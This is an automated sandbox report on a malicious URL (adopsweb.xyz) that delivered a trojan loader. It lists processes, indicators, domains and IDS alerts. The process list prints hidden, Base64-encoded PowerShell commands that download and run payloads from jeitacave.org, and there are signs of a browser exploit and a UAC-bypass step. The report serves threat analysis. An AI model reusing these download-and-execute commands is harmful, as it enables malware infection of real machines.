URL: http://adopsweb.xyz/

Full analysis: https://app.any.run/tasks/e2026dfb-4b41-4408-9875-fd7dcbc4b1a5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 18, 2019, 16:08:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, loader
Indicators:
MD5: FF20248C0B634F057FA3FEE8D4B530F4
SHA1: 010A4E987705E5813D29F3451A4316F58919B6AF
SHA256: A5AC73CFD511D5BF66FB5D250CCEABE21487A2A77C6D1807624B7670A4DD0980
SSDEEP: 3:N1KfaAr:Cn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Executes PowerShell scripts
      • mshta.exe (PID: 2608)
    • Starts Visual C# compiler
      • powershell.exe (PID: 3440)
      • powershell.exe (PID: 3200)
    • Downloads executable files from the Internet
      • powershell.exe (PID: 2472)
      • msiexec.exe (PID: 2612)
  • SUSPICIOUS
    • Reads Internet Cache Settings
      • mshta.exe (PID: 2608)
    • Starts MSHTA.EXE for opening HTA or HTMLS files
      • iexplore.exe (PID: 1008)
    • Creates files in the user directory
      • mshta.exe (PID: 2608)
      • powershell.exe (PID: 3200)
    • Application launched itself
      • powershell.exe (PID: 2472)
    • Executes PowerShell scripts
      • powershell.exe (PID: 2472)
    • Executable content was dropped or overwritten
      • msiexec.exe (PID: 2612)
  • INFO
    • Reads Internet Cache Settings
      • iexplore.exe (PID: 1008)
    • Reads internet explorer settings
      • iexplore.exe (PID: 1008)
      • mshta.exe (PID: 2608)
    • Changes internet zones settings
      • iexplore.exe (PID: 3624)
    • Application launched itself
      • iexplore.exe (PID: 3624)
      • msiexec.exe (PID: 2612)
    • Creates files in the user directory
      • iexplore.exe (PID: 1008)
No Malware configuration.
Total processes: 52
Monitored processes: 15
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Processes in the graph: iexplore.exe, iexplore.exe, mshta.exe, powershell.exe, eventvwr.exe, eventvwr.exe, mmc.exe, powershell.exe, csc.exe, cvtres.exe, msiexec.exe, powershell.exe, csc.exe, cvtres.exe, msiexec.exe

Process information

PID 3624
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" "http://adopsweb.xyz/"
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Internet Explorer
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 1008
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3624 CREDAT:71937
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  Parent process: iexplore.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Internet Explorer
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 2608
  CMD: mshta http://jeitacave.org/hta.hta
  Path: C:\Windows\system32\mshta.exe
  Parent process: iexplore.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Microsoft (R) HTML Application host
  Exit code: 0
  Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 2472
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA==
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: mshta.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Windows PowerShell
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3536
  CMD: "C:\Windows\System32\Eventvwr.exe"
  Path: C:\Windows\System32\Eventvwr.exe
  Parent process: powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Event Viewer Snapin Launcher
  Exit code: 3221226540
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2984
  CMD: "C:\Windows\System32\Eventvwr.exe"
  Path: C:\Windows\System32\Eventvwr.exe
  Parent process: powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: HIGH
  Description: Event Viewer Snapin Launcher
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3680
  CMD: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"
  Path: C:\Windows\system32\mmc.exe
  Parent process: Eventvwr.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: HIGH
  Description: Microsoft Management Console
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3440
  CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAG0AcwBpAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoAHMAdAByAGkAbgBnACAAcABhAGMAawBhAGcAZQBQAGEAdABoACwAIABzAHQAcgBpAG4AZwAgAGMAbwBtAG0AYQBuAGQATABpAG4AZQApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKABpAG4AdAAgAGQAdwBVAEkATABlAHYAZQBsACwAIABJAG4AdABQAHQAcgAgAHAAaABXAG4AZAApADsADQAKAH0ADQAKAA0ACgAiAEAADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBtAHMAaQBdADoAOgBNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKAAiAGgAdAB0AHAAOgAvAC8AagBlAGkAdABhAGMAYQB2AGUALgBvAHIAZwAvADEAVQAyADIAbgBPAEoASABGAGQARABtAFkAYwBnAEMAUwAuAGoAcABnACIALAAiACIAKQANAAoAZQB4AGkAdAANAAoA
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3860
  CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\dasxaw1i.cmdline"
  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
  Parent process: powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Visual C# Command Line Compiler
  Exit code: 0
  Version: 8.0.50727.4927 (NetFXspW7.050727-4900)

PID 3376
  CMD: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES20E7.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC20E6.tmp"
  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
  Parent process: csc.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Microsoft® Resource File To COFF Object Conversion Utility
  Exit code: 0
  Version: 8.00.50727.4940 (Win7SP1.050727-5400)
Total events: 1,005
Read events: 931
Write events: 0
Delete events: 0
Modification events: no data
Executable files: 2
Suspicious files: 2
Text files: 17
Unknown types: 5

Dropped files

PID 3624, iexplore.exe
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico

PID 3624, iexplore.exe
  Filename: C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

PID 3440, powershell.exe
  Filename: C:\Users\admin\AppData\Local\Temp\Low\dasxaw1i.cmdline
  Type: text
  MD5: 9065F5458530EB2C813423122DE51B8B
  SHA256: 431A81708D7FA14B588784794C9022E2737D27402146E88E6306BF3C5AEE6F87

PID 3860, csc.exe
  Filename: C:\Users\admin\AppData\Local\Temp\Low\CSC20E6.tmp
  Type: res
  MD5: 6D3EDF4362EF9AE6EBB32984FA2B7680
  SHA256: BAF070B2B65A9B8852E81CE649F5C996A51E6078A21B129F3F4A9FD7AC26FCF9

PID 1008, iexplore.exe
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RXMOEQQJ\alfcck_xyz[1].htm
  Type: html
  MD5: BC11A7E1430E3FB15BAC0F7164BD0A21
  SHA256: 445F8039159E4E11479A45198F51FF4790A2F5AB7CD8B17C241999183F7CDBAA

PID 1008, iexplore.exe
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat
  Type: dat
  MD5: 5D42E672F3E3820EDB1D01E5A92B7A46
  SHA256: 5ED2D48F39BD4475B108D60A682BC76C522BBB6CAFED56CE3DFF253060F3EC56

PID 1008, iexplore.exe
  Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat
  Type: dat
  MD5: 572B13540A9F066BAD72A6B4744E8761
  SHA256: 49D92B697CB4E39AFB26C972633C86EE3AF32879618C8B56C411D316968A397F

PID 1008, iexplore.exe
  Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@tyasmi[1].txt
  Type: text
  MD5: BD5BA3F66ABD8F5ABD5DA5718DEA1AE7
  SHA256: B620180DAFC55DDAE277B3743DE0ECCC741B2F02DBFA1473789FFBDA05F5A834

PID 3376, cvtres.exe
  Filename: C:\Users\admin\AppData\Local\Temp\Low\RES20E7.tmp

PID 3860, csc.exe
  Filename: C:\Users\admin\AppData\Local\Temp\Low\dasxaw1i.dll
HTTP(S) requests: 11
TCP/UDP connections: 9
DNS requests: 7
Threats: 0

HTTP requests

PID  | Process        | Method | HTTP Code | IP                 | URL                                                               | CN | Type       | Size    | Reputation
1008 | iexplore.exe   | GET    | 200       | 104.24.113.108:80  | http://alfcck.xyz/3.htm                                           | US | text       | 440 b   | malicious
1008 | iexplore.exe   | GET    | 404       | 104.24.113.108:80  | http://alfcck.xyz/cdn-cgi/apps/head/xGpmLMHiaqCy-agu1ud6fHqKiTo.js | US |            |         | malicious
2472 | powershell.exe | GET    | 200       | 104.28.18.126:80   | http://jeitacave.org/1808132.jpg                                  | US | executable | 81.5 Kb | malicious
2472 | powershell.exe | GET    | 200       | 104.28.18.126:80   | http://jeitacave.org/pe.jpg                                       | US | text       | 462 Kb  | malicious
2472 | powershell.exe | GET    | 200       | 104.28.18.126:80   | http://jeitacave.org/ps001.jpg                                    | US | text       | 81.6 Kb | malicious
1008 | iexplore.exe   | GET    | 200       | 104.24.113.108:80  | http://alfcck.xyz/                                                | US | html       | 7.59 Kb | malicious
2612 | msiexec.exe    | GET    | 200       | 104.28.18.126:80   | http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg                        | US | executable | 3.43 Mb | malicious
1008 | iexplore.exe   | GET    | 200       | 104.28.17.73:80    | http://tyasmi.xyz/                                                | US | html       | 205 b   | suspicious
2608 | mshta.exe      | GET    | 200       | 104.28.18.126:80   | http://jeitacave.org/hta.hta                                      | US | html       | 466 b   | malicious
1008 | iexplore.exe   | GET    | 200       | 104.18.56.245:80   | http://adopsweb.xyz/                                              | US | html       | 234 b   | suspicious

Connections

PID  | Process        | IP                 | Domain        | ASN                   | CN | Reputation
3624 | iexplore.exe   | 204.79.197.200:80  | www.bing.com  | Microsoft Corporation | US | whitelisted
1008 | iexplore.exe   | 104.18.56.245:80   | adopsweb.xyz  | Cloudflare Inc        | US | shared
     |                | 104.28.17.73:80    | tyasmi.xyz    | Cloudflare Inc        | US | shared
1008 | iexplore.exe   | 104.28.16.73:80    | tyasmi.xyz    | Cloudflare Inc        | US | shared
1008 | iexplore.exe   | 104.24.113.108:80  | alfcck.xyz    | Cloudflare Inc        | US | shared
     |                | 104.24.113.108:80  | alfcck.xyz    | Cloudflare Inc        | US | shared
2608 | mshta.exe      | 104.28.18.126:80   | jeitacave.org | Cloudflare Inc        | US | shared
2612 | msiexec.exe    | 104.28.18.126:80   | jeitacave.org | Cloudflare Inc        | US | shared
2472 | powershell.exe | 104.28.18.126:80   | jeitacave.org | Cloudflare Inc        | US | shared

DNS requests

Domain           | IP                             | Reputation
adopsweb.xyz     | 104.18.56.245, 104.18.57.245   | suspicious
www.bing.com     | 204.79.197.200, 13.107.21.200  | whitelisted
tyasmi.xyz       | 104.28.16.73, 104.28.17.73     | suspicious
dns.msftncsi.com | 131.107.255.255                | shared
alfcck.xyz       | 104.24.113.108, 104.24.112.108 | malicious
jeitacave.org    | 104.28.18.126, 104.28.19.126   | malicious

Threats

PID  | Process      | Class                                  | Message
1008 | iexplore.exe | Potentially Bad Traffic                | AV INFO HTTP Request to a *.xyz domain
1008 | iexplore.exe | Potentially Bad Traffic                | AV INFO HTTP Request to a *.xyz domain
1008 | iexplore.exe | Potentially Bad Traffic                | AV INFO HTTP Request to a *.xyz domain
1008 | iexplore.exe | Attempted User Privilege Gain          | ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Percent Hex Encode
1008 | iexplore.exe | Attempted User Privilege Gain          | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name
1008 | iexplore.exe | Attempted User Privilege Gain          | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct Hex Encode
1008 | iexplore.exe | Attempted Administrator Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2
1008 | iexplore.exe | A Network Trojan was detected          | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M3
1008 | iexplore.exe | Potentially Bad Traffic                | AV INFO HTTP Request to a *.xyz domain
1008 | iexplore.exe | Potentially Bad Traffic                | AV INFO HTTP Request to a *.xyz domain
2 ETPRO signatures available at the full report
Debug output strings

Process | Message
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144

(The pair of messages above is logged five times in a row.)